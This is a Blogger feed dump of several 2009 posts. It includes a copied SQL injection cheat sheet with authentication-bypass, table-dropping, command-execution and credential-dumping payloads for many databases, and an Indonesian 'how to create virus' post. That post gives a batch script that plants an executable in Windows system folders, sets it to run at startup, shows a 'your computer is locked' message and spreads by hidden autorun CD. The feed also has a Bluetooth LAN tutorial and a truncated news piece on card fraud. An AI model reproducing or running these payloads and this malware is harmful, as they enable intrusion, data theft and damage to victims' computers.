tag:blogger.com,1999:blog-63781940716981118922024-03-13T23:51:43.742-07:00astroboyywendysuharmokohttp://www.blogger.com/profile/06692930739487726756noreply@blogger.comBlogger5125tag:blogger.com,1999:blog-6378194071698111892.post-81485762129632016432009-08-22T15:03:00.001-07:002009-08-22T15:03:37.552-07:00SQL Injection<h1 class="btmspace" id="post-54">SQL Injection Cheat Sheet</h1> <!--post with more link --> <p>Related articles: <a href="http://michaeldaw.org/input_validation_cheat_sheet/">Input Validation Cheat Sheet (Want to find other input validation problems?)</a></p> <p><!--adsense--></p> <h3>Table of Contents</h3> <p> <a href="http://michaeldaw.org/sql-injection-cheat-sheet#auth">Generic – Bypass Authentication</a><br /><a href="http://michaeldaw.org/sql-injection-cheat-sheet#msql">Microsoft SQL</a><br /><a href="http://michaeldaw.org/sql-injection-cheat-sheet#sybase">Sybase</a><br /><a href="http://michaeldaw.org/sql-injection-cheat-sheet#mysql">MySQL</a><br /><a href="http://michaeldaw.org/sql-injection-cheat-sheet#oracle">Oracle</a><br /><a href="http://michaeldaw.org/sql-injection-cheat-sheet#postgres">PostgreSQL</a><br /><a href="http://michaeldaw.org/sql-injection-cheat-sheet#db2">DB2</a><br /><a href="http://michaeldaw.org/sql-injection-cheat-sheet#ingres">Ingres</a><br /><a href="http://michaeldaw.org/sql-injection-cheat-sheet#adv">Bypass SQL Injection Filters</a><br /><a href="http://michaeldaw.org/sql-injection-cheat-sheet#credits">References and Credits</a> </p> <h3>ChangeLog</h3> <table> <tbody><tr> <td>Date</td> <td>Change</td> </tr> <tr> <td>09/07/07</td> <td>DB2 Database SQL Injection Cheatsheet(Author: <a href="http://pentestmonkey.net/blog/db2-sql-injection-cheat-sheet/">pentestmonkey.net</a>)</td> </tr> <tr> <td>09/07/07</td> <td>Ingres Database SQL Injection Cheatsheet (Author: <a href="http://pentestmonkey.net/blog/ingres-sql-injection-cheat-sheet/">pentestmonkey.net</a>)</td> </tr> <tr> <td>13/03/07</td> <td>Bypass SQL Injection Filters</td> </tr> <tr> <td>03/01/06</td> <td>Added some more blind SQL injection tests for MySQL (Author: <a href="http://www.jungsonnstudios.com/blog/">jungsonn</a>)</td> </tr> <tr> <td>21/12/06</td> <td>Added Concat tests for blind SQL Injection tests.</td> </tr> <tr> <td>06/Nov/06</td> <td>Added PostgreSQL payloads</td> </tr> <tr> <td>06/Nov/06</td> <td>Added Data to Oracle</td> </tr> <tr> <td>06/Nov/06</td> <td>Added Sybase section</td> </tr> <tr> <td>Oct/06</td> <td>Wrote initial paper.</td> </tr> </tbody></table> <h3>Introduction</h3> <p> Comments:<br />This paper was primarily written to aid penetration testers. I hope you find it useful. Please email me additional payloads as you find them. </p> <p><br /><b>» Generic – Bypass Authentication</b> </p> <p>The following payloads are generally applied to login forms with a username and password. Correctly performing these attacks will allow you to authenticate to the web application (unless otherwise stated). </p> <table> <tbody><tr> <td>Payload</td> <td>Description (if any)</td> </tr> <tr> <td>realusername' OR 1=1–</td> <td>Authenticate as a real user without requiring a password.</td> </tr> <tr> <td>'OR '' = '</td> <td>Allows authentication without a valid username.</td> </tr> <tr> <td>admin'–</td> <td>Authenticate as user admin without a password.</td> </tr> <tr> <td>' union select 1, 'user', 'pass' 1–</td> <td>Requires knowledge of column names.</td> </tr> <tr> <td>'; drop table users–</td> <td>DANGEROUS! this will delete the user database if the table name is 'users'.</td> </tr> </tbody></table> <p><!--adsense#mdaw_imgbanner--></p> <p><br /><b>» Microsoft SQL</b> </p> <table style="table-layout: fixed; width: 600px;"> <tbody><tr> <td>Payload</td> <td>Description (if any)</td> </tr> <tr> <td>'admin –sp_password</td> <td>sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (–) can prevent SQL Injection queries being logged.</td> </tr> <tr> <td>select @@version</td> <td>View database version.</td> </tr> <tr> <td>select @@servername</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select @@microsoftversion</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select * from master..sysservers</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select * from sysusers</td> <td>View database usernames and passwords.</td> </tr> <tr> <td>exec master..xp_cmdshell 'ipconfig+/all'</td> <td>Misc. command execution with cp_cmdshell.</td> </tr> <tr> <td>exec master..xp_cmdshell 'net+view'</td> <td>Misc. command execution with cp_cmdshell.</td> </tr> <tr> <td>exec master..xp_cmdshell 'net+users'</td> <td>Misc. command execution with cp_cmdshell.</td> </tr> <tr> <td>exec master..xp_cmdshell 'ping+system-controlled-by-attacker'</td> <td>Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).</td> </tr> <tr> <td>BACKUP database master to disks='\\{IP}\{sharename}\backupdb.dat'</td> <td>Backup entire database to a file. This attack can be used to steal a database.</td> </tr> <tr> <td>create table myfile (line varchar(8000))" bulk insert foo from ‘c:\inetpub\wwwroot\auth.asp’" select * from myfile"–</td> <td>Reading files on the filesystem.</td> </tr> <tr> <td>xp_servicecontrol (START or STOP) <service></td> <td>Start and stop Windows Services.</td> </tr> <tr> <td>str1 + str2 OR <i>n</i>+<i>n</i></td> <td>Concat strings for blind SQL Injection tests.</td> </tr> </tbody></table> <p><br /><b>» Sybase</b> </p> <table> <tbody><tr> <td>Payload</td> <td>Description (if any)</td> </tr> <tr> <td>select @@version"–</td> <td>View database version.</td> </tr> <tr> <td>select name from master..syslogins"–</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select name from master..sysdatabases"–</td> <td>Misc. information disclosure</td> </tr> <tr> <td>convert(integer,(select+min(name)+from+syslogins+where+name>'))–</td> <td>Integer conversion “error” trick.</td> </tr> <tr> <td>convert(integer,(select+min(name)+from+syslogins+where+name>'sybase'))–</td> <td>An error will occur presenting the first value of the rowset (lets say its sybase). We then continue as before by placing the value into our query. An error will then present the next value in the rowset. We continue as before.</td> </tr> <tr> <td>xp_cmdshell 'ipconfig+/all'</td> <td>Misc. command execution with cp_cmdshell.</td> </tr> <tr> <td>xp_cmdshell 'net+view'</td> <td>Misc. command execution with cp_cmdshell.</td> </tr> <tr> <td>xp_cmdshell 'net+users'</td> <td>Misc. command execution with cp_cmdshell.</td> </tr> <tr> <td>xp_cmdshell 'ping+system-controlled-by-attacker'</td> <td>Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).</td> </tr> <tr> <td>waitfor delay '0:0:5'</td> <td>Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).</td> </tr> <tr> <td>create proxy_table myfile external file at "c:\temp\file_to_read.txt" select * from myfile"</td> <td>Reading files on the filesystem.</td> </tr> <tr> <td>create table myfile (record varchar(2000)) external file at "c:\temp\myfile.exe" insert into myfile values(0xAND_YOUR_BINARY_DATA)"</td> <td>Write file to filesystem.</td> </tr> <tr> <td>str1 + str2 or <i>n</i>+<i>n</i></td> <td>Concat strings for blind SQL Injection tests.</td> </tr> </tbody></table> <p><br /><b>» MySQL</b> </p> <table> <tbody><tr> <td>Payload</td> <td>Description (if any)</td> </tr> <tr> <td>select @@version;</td> <td>View database version.</td> </tr> <tr> <td>select host,user,db from mysql.db;</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select host,user,password from mysql.user;</td> <td>View MySQL usernames and passwords.</td> </tr> <tr> <td>create table myfile (input TEXT); load data infile ‘/etc/passwd’ into table myfile; OR load data infile ‘/home/{user}/.rhosts’ into table myfile; select * from myfile;</td> <td>Reading files on the filesystem.</td> </tr> <tr> <td>select host,user,password from user into outfile ‘/tmp/passwd’;</td> <td>Write files on the filesystem. This attack is limited by the fact that you can only write to either “/tmp” or “/var/tmp”.</td> </tr> <tr> <td>select CONCAT(”a”,”b”);</td> <td>Concat strings for blind SQL Injection tests.</td> </tr> <tr> <td>BENCHMARK(1000000000,MD5(’gainingtime’))</td> <td>Cause delay for blind SQL Injection tests.</td> </tr> <tr> <td>BENCHMARK(1000000000,MD5(CHAR(116)))</td> <td>Cause delay for blind SQL Injection tests. Same as before, but this can be used if quotes are filtered.</td> </tr> <tr> <td>IF EXISTS (SELECT * FROM users WHERE username = ‘root’) BENCHMARK(1000000000,MD5(’gainingtime’))</td> <td>Check if username exists, if yes there will be an delay.</td> </tr> <tr> <td>IF EXISTS (SELECT * FROM users WHERE username = ‘root’) WAITFOR DELAY ‘0:0:3′</td> <td>Check if username exists, if yes there will be an delay for 3 seconds.</td> </tr> </tbody></table> <p><br /><b>» Oracle</b> </p> <p> Robert Hurlbut has put together an awesome <a href="http://www.digitaldocumentsllc.com/">document</a> on Oracle SQL Injection. He seems to have far more experience in this area then I, so i will merely present a link to his blog entry on this topic (<a href="http://weblogs.asp.net/rhurlbut/archive/2004/01/24/62560.aspx">http://weblogs.asp.net/rhurlbut/archive/2004/01/24/62560.aspx</a>). </p> <table> <tbody><tr> <td>Payload</td> <td>Description (if any)</td> </tr> <tr> <td>str1 || str2 OR CONCAT (str1, str2)</td> <td>Concat strings for blind SQL Injection tests.</td> </tr> </tbody></table> <p><br /><b>» PostgreSQL</b> </p> <table> <tbody><tr> <td>Payload</td> <td>Description (if any)</td> </tr> <tr> <td>select version();</td> <td>View database version.</td> </tr> <tr> <td>select current_database();</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_user;</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select session_user;</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_setting(’log_connections’);</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_setting(’log_statement’);</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_setting(’port’);</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_setting(’password_encryption’);</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_setting(’krb_server_keyfile’);</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_setting(’virtual_host’);</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_setting(’port’);</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_setting(’config_file’);</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_setting(’hba_file’);</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select current_setting(’data_directory’);</td> <td>Misc. information disclosure</td> </tr> <tr> <td>select * from pg_shadow;</td> <td>View database usernames and passwords.</td> </tr> <tr> <td>select * from pg_group;</td> <td>View database usernames and passwords.</td> </tr> <tr> <td>create table myfile (input TEXT); copy myfile from ‘/etc/passwd’; select * from myfile;</td> <td>Read files on the filesystem.</td> </tr> <tr> <td>copy myfile to ‘/tmp/test’;</td> <td>Write files to filesystem.</td> </tr> <tr> <td>str1 || str2</td> <td>Concat strings for blind SQL Injection tests.</td> </tr> </tbody></table> <p><br /><b>» DB2</b> </p> <table> <tbody><tr> <td>Payload</td> <td>Description (if any)</td> </tr> <tr> <td>Comments</td> <td>select blah from foo; — comment like this</td> </tr> <tr> <td> Batching Queries Allowed?</td> <td>???</td> </tr> <tr> <td> Database Version</td> <td> <p>select versionnumber, version_timestamp from sysibm.sysversions;</p> </td> </tr> <tr> <td> Current Database User</td> <td> <p>select user from sysibm.sysdummy1;<br />select session_user from sysibm.sysdummy1; </p> </td> </tr> <tr> <td> System User for Current Connection</td> <td>select system_user from sysibm.sysdummy1;</td> </tr> <tr> <td> Current Database</td> <td>select current server from sysibm.sysdummy1;</td> </tr> <tr> <td> Limiting Rows Returned</td> <td> <p>SELECT foo FROM bar fetch first 1 rows only;</p> </td> </tr> <tr> <td>Returning N Rows starting at Offset M</td> <td>select name from (SELECT name FROM sysibm.systables order by<br />name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only; </td> </tr> <tr> <td> List Tables</td> <td>select name from sysibm.systables;</td> </tr> <tr> <td> List Columns</td> <td>select name, tbname, coltype from sysibm.syscolumns;</td> </tr> <tr> <td> List Databse Users and Passwords</td> <td>Database authorities (like roles, I think) can be listed like this:<br />select grantee from syscat.dbauth;</td> </tr> <tr> <td> FROM clause mandated in SELECTs?</td> <td>Yes, use sysibm.sysdummy1:<br />select 123 from sysibm.sysdummy1; </td> </tr> <tr> <td> UNION supported</td> <td>Yes<br />select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;</td> </tr> <tr> <td> Enumerate Tables Privs</td> <td>select * from syscat.tabauth;</td> </tr> <tr> <td> Enumerate Current Privs </td> <td>select * from syscat.dbauth where grantee = current user;<br />select * from syscat.tabauth where grantee = current user;</td> </tr> <tr> <td> Length of a string</td> <td>select name, tbname, coltype from sysibm.syscolumns; — returns 3</td> </tr> <tr> <td> Bitwise AND</td> <td><a href="http://www.tar.hu/sqlbible/sqlbible0084.html">This page</a> seems to indicate that DB2 has no support for bitwise operators!</td> </tr> <tr> <td> Substring</td> <td> <p>SELECT SUBSTR(’abc’,2,1) FROM sysibm.sysdummy1; — returns b</p> </td> </tr> <tr> <td> ASCII value of a character</td> <td>select ascii(’A') from sysibm.sysdummy1; — returns 65</td> </tr> <tr> <td>Character from ASCII value</td> <td>select chr(65) from sysibm.sysdummy1; — returns ‘A’</td> </tr> <tr> <td> Roles and passwords</td> <td>N/A (I think DB2 uses OS-level user accounts for authentication.) </td> </tr> <tr> <td>List Database Procedures</td> <td> ???</td> </tr> <tr> <td>Create Users + Granting Privs</td> <td> ???</td> </tr> <tr> <td> Time Delays</td> <td> ???</td> </tr> <tr> <td> Execute OS Commands</td> <td> ???</td> </tr> <tr> <td> Write to File System</td> <td> ???</td> </tr> <tr> <td> Concatenation</td> <td>SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’<br />select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’</td> </tr> <tr> <td> Casting</td> <td>SELECT cast(’123′ as integer) FROM sysibm.sysdummy1;<br />SELECT cast(1 as char) FROM sysibm.sysdummy1;</td> </tr> <tr> <td>List schemas</td> <td>SELECT schemaname FROM syscat.schemata;</td> </tr> </tbody></table> <p><br /><b>» Ingres</b> </p> <table> <tbody><tr> <td>Payload</td> <td>Description (if any)</td> </tr> <tr> <td>Comments</td> <td> <p>Normal “–” and C-style /**/ comments are allowed:<br />select 123; — sdfjsdlkfj<br />select 123; /* sdfsdf */ </p> </td> </tr> <tr> <td> Batching Queries Allowed?</td> <td> <p>Not via DBI in PERL. Subsequent statements seem to get ignored:<br />select blah from table where foo = 1; select … doesn’t matter this is ignored. </p> </td> </tr> <tr> <td> Database Version</td> <td>select dbmsinfo(’_version’);</td> </tr> <tr> <td> Current Database User</td> <td>select dbmsinfo(’session_user’);</td> </tr> <tr> <td> System User for Current Connection</td> <td>select dbmsinfo(’system_user’);</td> </tr> <tr> <td> Current Database</td> <td>select dbmsinfo(’database’);</td> </tr> <tr> <td> Limiting Rows Returned</td> <td> <p>select top 10 blah from table;<br />select first 10 blah form table; </p> </td> </tr> <tr> <td> Returning N Rows starting at Offset M</td> <td> <p>Astoundingly, this <a href="http://community.ingres.com/forums/viewtopic.php?p=6050">doesn’t</a> seem to be possible!</p> </td> </tr> <tr> <td> List Tables</td> <td> <p>select table_name, table_owner from iitables;<br />select relid, relowner, relloc from iirelation;<br />select relid, relowner, relloc from iirelation where relowner != ‘$ingres’; </p> </td> </tr> <tr> <td> List Columns</td> <td>select column_name, column_datatype, table_name, table_owner from iicolumns;</td> </tr> <tr> <td> List Databse Users and Passwords</td> <td> <p>First connect to iidbdb, then:<br />select name, password from iiuser; </p> </td> </tr> <tr> <td> FROM clause mandated in SELECTs?</td> <td> <p>No. You don’t need to select form “dual” or anything. The following is legal:<br />select 1; </p> </td> </tr> <tr> <td> UNION supported</td> <td> <p>Yes. Nothing tricky here. The following is legal:<br />select 1 union select 2; </p> </td> </tr> <tr> <td> Enumerate Tables Privs</td> <td>select table_name, permit_user, permit_type from iiaccess;</td> </tr> <tr> <td> Enumerate Current Privs </td> <td> <p>select dbmsinfo(’db_admin’);<br />select dbmsinfo(’create_table’);<br />select dbmsinfo(’create_procedure’);<br />select dbmsinfo(’security_priv’);<br />select dbmsinfo(’select_syscat’);<br />select dbmsinfo(’db_privileges’);<br />select dbmsinfo(’current_priv_mask’);</p> </td> </tr> <tr> <td> Length of a string</td> <td>select length(’abc’); — returns 3</td> </tr> <tr> <td> Bitwise AND</td> <td> <p>The function “bit_and” exists, but seems hard to use. Here’s an<br />example of ANDing 3 and 5 together. The result is a “byte” type<br />with value \001:</p> <p>select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1); </p> </td> </tr> <tr> <td> Substring</td> <td>select substr(’abc’, 2, 1); — returns ‘b’</td> </tr> <tr> <td> ASCII value of a character</td> <td> ???<br />(The “ascii” function exists, but doesn’t seem to do what I’d expect.)</td> </tr> <tr> <td> Roles and passwords</td> <td> <p>First you need to connect to iidbdb, then:<br />select roleid, rolepass from iirole; </p> </td> </tr> <tr> <td>List Database Procedures</td> <td> <p>First you need to connect to iidbdb, then:<br />select dbp_name, dbp_owner from iiprocedure;</p> </td> </tr> <tr> <td>Create Users + Granting Privs</td> <td> <p>First you need to connect to iidbdb, then:<br />create user pm with password = ‘password’;<br />grant all on current installation to pm; </p> </td> </tr> <tr> <td> Time Delays</td> <td>???</td> </tr> <tr> <td> Execute OS Commands</td> <td>??? </td> </tr> <tr> <td> Write to File System</td> <td>???</td> </tr> <tr> <td> Concatenation</td> <td> select ‘abc’ || ‘def’;</td> </tr> <tr> <td> Casting</td> <td> select cast(123 as varchar);<br />select cast(’123′ as integer); </td> </tr> </tbody></table> <p><br /><b>» Bypass SQL Injection Filters</b></p> <table><tbody><tr> <td>Payload</td> <td>Description (if any)</td> </tr> <tr> <td>select password from tablename where username = concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39)) into outfile concat(char(39),char(97),char(100),char(109),char(105),char(110),char( 39))</td> <td>Writing info into files without single quotes (example). You must specify a new file (it may not exist) and give the correct pathname.</td> </tr> <tr> <td>select * from login where user = char(39,97,39)</td> <td>Using char() to bypass restrictions.</td></tr></tbody></table>wendysuharmokohttp://www.blogger.com/profile/06692930739487726756noreply@blogger.com0tag:blogger.com,1999:blog-6378194071698111892.post-68064815598637674592009-08-22T00:29:00.001-07:002009-08-22T00:29:36.865-07:00<img style="visibility:hidden;width:0px;height:0px;" border=0 width=0 height=0 src="http://counters.gigya.com/wildfire/IMP/CXNID=2000002.11NXC/bHQ9MTI1MDkyNTgyNTk1MyZwdD*xMjUwOTI2MTYwMDkzJnA9Mzg2MzYxJmQ9Jm49YmxvZ2dlciZnPTEmZj1iJm9mPTA=.gif" /><a href="http://s559.photobucket.com/albums/ss35/wenzneverfalse/?action=view¤t=wen-1.jpg" target="_blank"><img src="http://i559.photobucket.com/albums/ss35/wenzneverfalse/wen-1.jpg" border="0" alt="Photobucket"></a>wendysuharmokohttp://www.blogger.com/profile/06692930739487726756noreply@blogger.com0tag:blogger.com,1999:blog-6378194071698111892.post-60751061712690451482009-08-21T00:31:00.000-07:002009-08-21T04:25:28.977-07:00Membuat Jaringan LAN dengan bluetooth<ol style="color: rgb(0, 0, 0); font-weight: bold;font-family:times new roman;"><li><span class="fullpost" style="font-size:100%;">ternyata bluetooth juga selain untuk berkirim dan menerima data juga bisa dijadikan untuk LAN atau sering disebut local area network atau dalam bahasa indonesianya disebut jaringan..</span><span style="font-size:100%;"><br />untuk membuat jaringan dengan bluetooth caranya seperti ini:<br /><br />1.siapkan 2 buah bluetooth(kalo kita hanya ingin membuat jaringan dengan 2 komputer) beserta drivernya<o:p></o:p></span></li></ol><div face="times new roman" style="text-align: left; color: rgb(0, 0, 0); font-weight: bold;"> </div><p style="background: white none repeat scroll 0% 50%; line-height: 18pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(0, 0, 0); text-align: left; font-weight: bold;font-family:lucida grande;"><span class="fullpost" style="font-size:100%;">2.pasang bluetooth di USB computer lalu install bluetooth seperti biasa..</span><span style="font-size:100%;"><o:p></o:p></span></p><div face="times new roman" style="text-align: left; color: rgb(0, 0, 0); font-weight: bold;"> </div><p style="background: white none repeat scroll 0% 50%; line-height: 18pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(0, 0, 0); text-align: left; font-weight: bold;font-family:lucida grande;"><span class="fullpost" style="font-size:100%;">3.jika installasi sudah sukses..biasanya akan muncul icon bluetooth di tray bar.kalo warnanya sudah putih berarti bluetooth aktif dan siap digunakan.tapi jika masih merah berarti bluetooth belum aktif.maka yang harus kita lakukan adalah klik kanan iconnya lalu pilih start bluetooth device.</span><span style="font-size:100%;"><o:p></o:p></span></p><div face="times new roman" style="text-align: left; color: rgb(0, 0, 0); font-weight: bold;"> </div><p style="background: white none repeat scroll 0% 50%; line-height: 18pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(0, 0, 0); text-align: left; font-weight: bold;font-family:lucida grande;"><span class="fullpost" style="font-size:100%;">4.coba pairing(menghubungkan) antara 1 computer dengan computer lain.caranya klik kanan icon bluetooth pilih </span><span style="font-size:100%;"><strong>quick connect-network acces-other device</strong></span><span class="fullpost" style="font-size:100%;">..silakan tuggu sebentar,bluetooth sedang mencari perangkat yang aktif..jika ada perangkat yang aktif maka akan muncul nama komputer,klik nama komputer itu.biasanya saat pertama kali pairing akan diminta memasukkan code tertentu..masukkan saja sembarang code tapi ingat code yang dimasukkan harus sama antara satu komputer dengan komputer lainnya...</span><span style="font-size:100%;"><o:p></o:p></span></p><div face="times new roman" style="text-align: left; color: rgb(0, 0, 0); font-weight: bold;"> </div><p style="background: white none repeat scroll 0% 50%; line-height: 18pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(0, 0, 0); text-align: left; font-weight: bold;font-family:lucida grande;"><span class="fullpost" style="font-size:100%;">5.Jika sukses maka akan keluar tulisan "</span><span style="font-size:100%;"><strong>created network with..."</strong><o:p></o:p></span></p><div style="text-align: left; font-family: times new roman; color: rgb(0, 0, 0); font-weight: bold;"> </div><p style="background: white none repeat scroll 0% 50%; line-height: 18pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(0, 0, 0); text-align: left; font-weight: bold;font-family:lucida grande;"><span class="fullpost" style="font-size:100%;">6.sekarang komputer anda sudah siap untuk saling bertukar data.</span><span style="font-size:100%;"><o:p></o:p></span></p><div style="text-align: left; font-family: times new roman; color: rgb(0, 0, 0); font-weight: bold;"> </div><p style="background: white none repeat scroll 0% 50%; line-height: 18pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(0, 0, 0); text-align: left; font-weight: bold;font-family:times new roman;"><span style="font-size:100%;">7.tapi biasanya untuk sharing internet masih belum bisa.kita harus melakukan settingan tertentu.. caranya pilih control panel-network connection-pilih coneksi yang kamu pakai,trus klik kanan pilih properties-advanced.disana akan ada pilihan <strong>internet connection sharing</strong>.aktifkan pilihan <strong>"allow other network users to connect through this computer internet's connection"</strong>..lalu di kotak home network connection pilih <strong>"bluetooth network"</strong><o:p></o:p></span></p><div style="text-align: left; font-family: times new roman; color: rgb(0, 0, 0); font-weight: bold;"> </div><p style="background: white none repeat scroll 0% 50%; line-height: 18pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(0, 0, 0); text-align: left; font-weight: bold;font-family:times new roman;"><span style="font-size:100%;">sekarang anda sudah siap berselancar internet dengan 2 komputer tanpa direpotkan oleh kabel...jika ada pertanyaan silahkan isi kotak komentar..<o:p></o:p></span></p><div style="text-align: left; font-family: times new roman; color: rgb(0, 0, 0); font-weight: bold;"> <span style="color: rgb(0, 0, 0);font-size:100%;" class="fullpost" >catatan:biasanya untuk setiap bluetooth pilihannya berbeda beda.tapi pada intinya yang penting ada pilihan network acces,berarti bluetooth itu bisa dijadikan jaringan..</span></div>wendysuharmokohttp://www.blogger.com/profile/06692930739487726756noreply@blogger.com0tag:blogger.com,1999:blog-6378194071698111892.post-36704887687748313922009-08-21T00:16:00.000-07:002009-08-21T03:35:20.544-07:00how to create virus<p style="color: rgb(0, 0, 0); text-align: left;font-family:trebuchet ms;"><span style="font-weight: bold;font-size:100%;" >@echo off<br />copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y<br />copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y<br />copy image_name(terserah dari nama </span><span style="font-size:100%;"><a id="publishButton" class="cssButton" href="javascript:void(0)" target="" onclick="if (this.className.indexOf("ubtn-disabled") == -1) {var e = document['stuffform'].publish;(e.length) ? e[0].click() : e.click(); if (window.event) window.event.cancelBubble = true; return false;}"><div class="cssButtonOuter"><div class="cssButtonMiddle"><div class="cssButtonInner">Terbitkan Entri</div></div></div></a></span><span style="font-weight: bold;font-size:100%;" >file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y<br />copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y<br />copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y<br />copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y<br />reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f<br />reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f<br />reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f<br />reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f<br />reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f<br />reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f<br />reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f</span></p><div style="color: rgb(0, 0, 0); text-align: left;"> </div><p style="color: rgb(0, 0, 0); text-align: left;font-family:trebuchet ms;"><span style="font-size:100%;">- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)<br />- buat Autorun.inf dengan script:</span></p><div style="color: rgb(0, 0, 0); text-align: left;"> </div><p style="color: rgb(0, 0, 0); text-align: left;font-family:trebuchet ms;"><span style="font-weight: bold;font-size:100%;" >[autorun]<br />open=nama_file.bat</span></p><div style="color: rgb(0, 0, 0); text-align: left;"> </div><p style="color: rgb(0, 0, 0); text-align: left;font-family:trebuchet ms;"><span style="font-size:100%;">- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)<br />- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY<br />- copy file-file tsb ke CD<br />- nikmati efeknya</span></p>wendysuharmokohttp://www.blogger.com/profile/06692930739487726756noreply@blogger.com0tag:blogger.com,1999:blog-6378194071698111892.post-71934902431743273662009-08-21T00:04:00.000-07:002009-09-13T05:01:51.370-07:00aLL about carding<div style="text-align: left; color: rgb(0, 0, 0);font-family:trebuchet ms;"><span style="font-size:100%;">Surabaya - Fraud atau pemalsuan masih menjadi momok menakutkan bagi - issuer (penerbit kartu kredit). Meski berbagai kasus berhasil dibongkar dan penegakan hukum dilakukan, fraud masih saja terjadi.</span><br /><span style="font-size:100%;">Menurut Koordinator Asosiasi Kartu Kredit Indonesia (AKKI) Jatim Dwi Yulianto, dalam refleksi kinerja 2006, kasus card fraud (pemalsuan kartu) maupun application fraud (pemalsuan aplikasi) dialami hampir semua issuer. "Tahun lalu, ada lima kasus besar di Jatim dengan nilai pemalsuan hingga miliaran rupiah," ujarnya.</span><br /><span style="font-size:100%;">Dia mengatakan, meski beberapa pelaku telah diadili dan dijatuhi hukuman penjara, hal itu tidak membuat pelaku lainnya jera. Buktinya, lanjut dia, hingga semester I tahun ini sudah ada empat kasus di Surabaya yang ditangani pihak kepolisian, bahkan salah satunya sudah divonis.</span><br /><span style="font-size:100%;">"Semuanya kasus application fraud," terang card center manager Bank Permata Surabaya tersebut.</span><br /><span style="font-size:100%;">Karena itu, menurut Dwi, manajemen resiko fraud selalu menjadi pembahasan dalam setiap forum AKKI. Sebab, lanjut dia, penyaluran dana lewat kartu kredit termasuk kategori unsecure loan karena tidak menyertakan jaminan sehingga beresiko tinggi. "Sehingga, cara paling efektif bagi issuer untuk menekan resiko fraud adalah memilih nasabah secara lebih selektif," katanya.</span><br /><span style="font-size:100%;">Hingga April 2007, total outstanding kartu kredit secara nasional mencapai Rp 18,7 triliun. Jumlah kartu kredit yang beredar pun sudah menembus 8,2 juta dengan jumlah pemegang kartu sekitar 4 juta orang. Sekitar 15-20 persennya berada di Jatim. "Tahun ini, pertumbuhan belanja kartu kredit diprediksi mencapai 20 persen," terangnya.</span><br /><br /><span 